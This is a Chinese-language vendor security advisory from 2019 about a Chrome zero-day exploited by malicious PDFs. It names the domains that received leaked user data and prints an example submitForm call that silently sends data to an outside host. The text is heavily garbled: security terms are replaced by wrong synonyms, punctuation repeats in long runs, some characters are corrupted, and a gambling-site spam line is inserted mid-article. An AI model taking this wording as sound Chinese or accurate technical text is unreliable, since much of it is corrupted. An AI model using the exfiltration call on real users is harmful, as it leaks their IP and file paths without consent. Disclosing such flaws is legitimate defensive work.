首页 > 清静研究 > 清静转达 > 清静通告

恶意PDF文件使用Chrome浏览器0day误差清静通告

宣布时间 2019-03-01

误差编号和级别

CVE编号：暂无，，，，，，危险级别：高危，，，，，， CVSS分值：官方未评定

影响规模

受影响版本：

Google Chrome浏览器所有版本

误差概述

近期，，，，，，来自外洋的清静研究职员在野外检测到多个PDF恶意样本。。。这些样本使用了Chrome浏览器的0day误差，，，，，，以实现追踪用户并悄悄某些网络用户信息的目的。。。

现在发明了两组使用Chrome零日误差的恶意PDF文件，，，，，，其中一组文件在2017年10月撒播，，，，，，另一组文件在2018年9月撒播。。。第一批恶意PDF文件将用户数据发送回“readnotify.com”，，，，，，第二批发送回“zuxjk0dftoamimorjl9dfhr44vap3fr7ovgi76w.burpcollaborator.net”。。。

误差的泉源在于this.submitForm()这个PDF Javascript API。。。像this.submitForm('http://google.com/test')这样一个简朴的挪用就会导致Chrome把小我私家信息发送到google.com。。�？？？？？？？赡鼙恍孤兜男畔ǎ�

1.用户的公共IP地点。。。

2.操作系统，，，，，，Chrome版本等(在HTTP POST header中)。。。

3.用户盘算机上PDF文件的完整路径(在HTTP POST payload中)。。。

当用户使用Chrome浏览器翻开这些恶意样本时，，，，，，样本会运行恶意代码，，，，，，在未经用户批准的情形下，，，，，，以HTTP POST数据包的形式将一些用户信息静默发送到指定域“readnotify.com ”。。。

918博天堂(中国游)最新官方网站

除去信息泄露以外，，，，，，该误差暂未发明其它使用方法，，，，，，但毫无疑问，，，，，，这些泄露的用户信息可以资助攻击者举行更多活动。。。

修复建议

现在该0day误差尚未有官方补丁，，，，，，但Chrome团队或许将于4月尾修复该误差。。。

暂时缓解步伐：

在补丁宣布之前，，，，，，建议用户使用PDF阅读器应用程序在外地审查PDF文档，，，，，，直到Chrome修复误差。。�；；；；；蛟贑hrome中翻开PDF文档时断开盘算机与Internet的毗连。。。

参考链接

https://blog.edgespot.io/2019/02/edgespot-detects-pdf-zero-day-samples.html

7*24小时效劳热线

400-624-3900

+86(10)56631988(港澳专线)

官方微信

官方微博

网御星云合众数据书生电子云子可信

执法声明

软件升级

投资者关系